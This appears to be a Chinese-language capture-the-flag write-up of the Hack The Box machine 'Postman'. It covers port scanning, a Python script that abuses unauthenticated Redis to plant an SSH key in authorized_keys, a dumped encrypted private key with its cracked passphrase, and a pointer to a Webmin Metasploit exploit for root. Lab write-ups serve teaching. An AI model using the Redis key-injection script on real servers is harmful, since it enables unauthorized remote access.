前言
Author: 0x584A
信息收集
先用nmap进行端口扫描
# Nmap 7.80 scan initiated Sun Feb 16 06:37:34 2020 as: nmap -sV -sC -oA server postman.htb
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 16 07:01:34 2020 -- 1 IP address (1 host up) scanned in 1439.92 seconds
可以看到10000端口上运行着 webmin 服务
尝试用搜索到的Exploit脚本,Webmin 1.9* 的都不行,必须要拿到用户名密码才可以。
一度陷入僵局,后来在BBS找找到了提示,再次扫描全部端口。
nmap -sV -sC -Pn -p- -oA server 10.10.10.160 --min-rate 4000
$ cat server.nmap
# Nmap 7.80 scan initiated Sun Feb 16 08:38:52 2020 as: nmap -sV -sC -Pn -p- -oA server --min-rate 4000 10.10.10.160
Warning: 10.10.10.160 giving up on port because retransmission cap hit (10).
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.21s latency).
Not shown: 65491 closed ports, 40 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 16 08:40:27 2020 -- 1 IP address (1 host up) scanned in 95.09 seconds
多了个redis端口,也就是说nmap默认的扫描是含6379端口的。
User Flag
好吧,存在未授权漏洞,接下来就是拿shell了。
一顿折腾后,root 的/root/.ssh 无权限保存文件,又找不到Web服务的绝对路径写shell。
写计划任务也是,权限不足无法保存,又开始自闭了…
在BBS中留意到,“I got access with r…. user and found the i._….k file.”
需要用redish用户登陆,但我在 /home/redis/.ssh下无法写文件。
尝试获取信息 CONFIG GET *
好吧我懂了,按照文档写密钥:https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
但是redis的会话老是掉,写个简单的脚本来自动写入id_rsa。
import redis
import random
name=random.randint(0,999)
id_rsa="\n\nssh-rsa xxx<id_rsa>xxx\n\n"
r = redis.Redis(host='10.10.10.160', port=6379)
r.set(f'ss-key{name}', f'{id_rsa}')
print(f'set ss-key{name}')
r.config_set('dir','/var/lib/redis/.ssh')
print('set config')
r.config_set('dbfilename','authorized_keys')
print('set config dbfilename')
r.save()
print('Yes!')
通过查看 /home 目录,有一个 Matt 的用户,在 /opt 下发现这个用户的 id_ras.back 文件。
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
解出来密码为:computer2008
但是尝试登录 Matt 时提示被拒,搜索 sshd 配置文件内容呢,发现单独 禁用了 Matt 的SSH登陆。
那么直接 redis 切 Matt 就好了
Root Flag
在进程中发现 webmin 是用root身份运行的,所以这里还是要拿到 webmin 的shell。
root 682 1 0 12:21 ? 00:00:03 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
此时已经知道了 Matt 的账号的密码了,尝试运行msf拿shell: https://www.uedbox.com/post/59130/